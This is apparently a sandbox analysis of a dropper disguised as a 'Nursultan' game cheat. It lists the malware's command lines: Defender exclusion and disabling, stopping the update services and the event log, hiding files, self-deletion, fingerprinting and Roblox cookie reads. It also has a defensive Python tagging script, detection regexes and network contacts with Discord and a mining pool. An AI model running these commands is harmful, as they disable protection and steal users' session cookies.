
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" start TrustedInstaller

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" start lsass

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" qc windefend

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" stop windefend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
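
The process records above carry the whole tampering sequence as bare command lines: Defender exclusions and Set-MpPreference switches, sc.exe stops of the update stack and the event log, removal of the Malicious Software Removal Tool (KB890830) via wusa, powercfg timeouts zeroed so the miner is never suspended, attrib +h +s and a ping-delayed self-delete, wmic fingerprinting, and the Roblox cookie lookups. The script below is an added example, not part of the sandbox report or of the malware's tooling: it takes records in the same (image path, command line) shape, tags each with a behaviour label and the ATT&CK technique the author maps it to, and flags Windows system-binary names launched from user-writable paths. The sample records are a constructed subset copied from the list above; the rule set, label names and technique mappings are the author's assumptions, not sandbox output.

```python
"""Tag sandbox process records with behaviour labels (added example; rules and ATT&CK mappings are the author's assumptions)."""
import re
from collections import defaultdict

# (label, ATT&CK technique, case-insensitive regex over the raw command line).
# Patterns are deliberately tied to the spellings the sandbox captured above.
RULES = [
    ("defender-exclusion", "T1562.001", r"Add-MpPreference\s.*-Exclusion(Path|Extension|Process)"),
    ("defender-disable", "T1562.001", r"Set-MpPreference\s.*-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning|IntrusionPreventionSystem)\s+\$true"),
    ("defender-cloud-optout", "T1562.001", r"-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+(NeverSend|2)\b"),
    ("eventlog-stopped", "T1562.002", r"\bsc(\.exe)?\s+stop\s+eventlog\b"),
    ("update-service-stopped", "T1489", r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b"),
    ("msrt-removed", "T1562.001", r"\bwusa(\.exe)?\s+/uninstall\s+/kb:890830\b"),
    ("service-started", "T1569.002", r"\bsc(\.exe)?\s+start\s+\S+"),
    ("sleep-disabled", "T1653", r"\bpowercfg(\.exe)?\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b"),
    ("file-hidden", "T1564.001", r'\battrib(\.exe)?"?\s+.*\+h\b.*\+s\b'),
    ("self-delete", "T1070.004", r"\bping\s+localhost\s*&&\s*del\s+/F\b"),
    ("host-fingerprint", "T1082", r'\bwmic(\.exe)?"?\s+(os\s+get\s+Caption|computersystem\s+get\s+totalphysicalmemory|csproduct\s+get\s+uuid|path\s+win32_VideoController)|PROCESSOR_IDENTIFIER'),
    ("roblox-cookie-theft", "T1552.002", r"Get-ItemPropertyValue\s.*\\Roblox\\.*-Name\s+\.ROBLOSECURITY"),
    ("execution-policy-bypass", "T1059.001", r"-ExecutionPolicy\s+Bypass\b"),
]
COMPILED = [(label, tid, re.compile(rx, re.IGNORECASE)) for label, tid, rx in RULES]

# Windows system binary names that have no business running from a user-writable path.
SYSTEM_BINARY_NAMES = {"svchost.exe", "conhost.exe", "dllhost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"^[A-Z]:\\(Users|ProgramData)\\", re.IGNORECASE)

# Constructed sample: a subset of the records listed above, copied as the sandbox recorded them.
SAMPLE_RECORDS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'"""),
    (r"C:\Windows\SYSTEM32\attrib.exe",
     r'''"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'''),
    (r"C:\Users\Admin\AppData\Roaming\svchost.exe",
     r"C:\Users\Admin\AppData\Roaming\svchost.exe"),
    (r"C:\Windows\System32\Wbem\wmic.exe",
     r'''"wmic.exe" csproduct get uuid'''),
    (r"C:\Windows\SYSTEM32\cmd.exe",
     r'''"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause'''),
    (r"C:\Windows\system32\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    (r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (r"C:\Windows\system32\sc.exe", r'''C:\Windows\system32\sc.exe start "XMRKNZQC"'''),
    (r"C:\Windows\System32\Conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]


def classify(cmdline):
    """Return every (label, technique) pair whose rule matches this command line."""
    return [(label, tid) for label, tid, rx in COMPILED if rx.search(cmdline)]


def image_flags(image_path):
    """Flag executables in user-writable locations, and system-binary names masquerading there (T1036.005)."""
    name = image_path.rsplit("\\", 1)[-1].lower()
    flags = []
    if USER_WRITABLE.match(image_path):
        flags.append("user-writable-location")
        if name in SYSTEM_BINARY_NAMES:
            flags.append("system-binary-name-masquerade")
    return flags


def triage(records):
    """Group command lines by label, flag suspicious image paths, and collect the records no rule
    explains; returns (by_label, flagged_images, untagged) so the analyst sees the gaps too."""
    by_label, flagged, untagged = defaultdict(list), {}, []
    for image, cmdline in records:
        hits = classify(cmdline)
        for label, _ in hits:
            by_label[label].append(cmdline)
        flags = image_flags(image)
        if flags:
            flagged[image] = flags
        if not hits and not flags:
            untagged.append(cmdline)
    return dict(by_label), flagged, untagged


def attack_techniques(records):
    """Sorted, de-duplicated ATT&CK technique IDs observed across the records."""
    return sorted({tid for _, cmd in records for _, tid in classify(cmd)})


if __name__ == "__main__":
    for label, cmds in triage(SAMPLE_RECORDS)[0].items():
        print(f"{label}: {len(cmds)} record(s)")
```

Two caveats a practitioner should carry over. The rules match the exact spellings the sandbox captured (`-ExecutionPolicy Bypass`, `Add-MpPreference -ExclusionPath`); a production detection would also have to cover abbreviated PowerShell parameters, encoded commands and the Defender WMI/registry paths, none of which this sample exercises. Second, two of the Roblox lookups above use `HKLN:`, which is not a PowerShell drive, so those particular commands fail on the host; the rule keys on the value name `.ROBLOSECURITY` rather than the hive so the attempt is still tagged.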

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
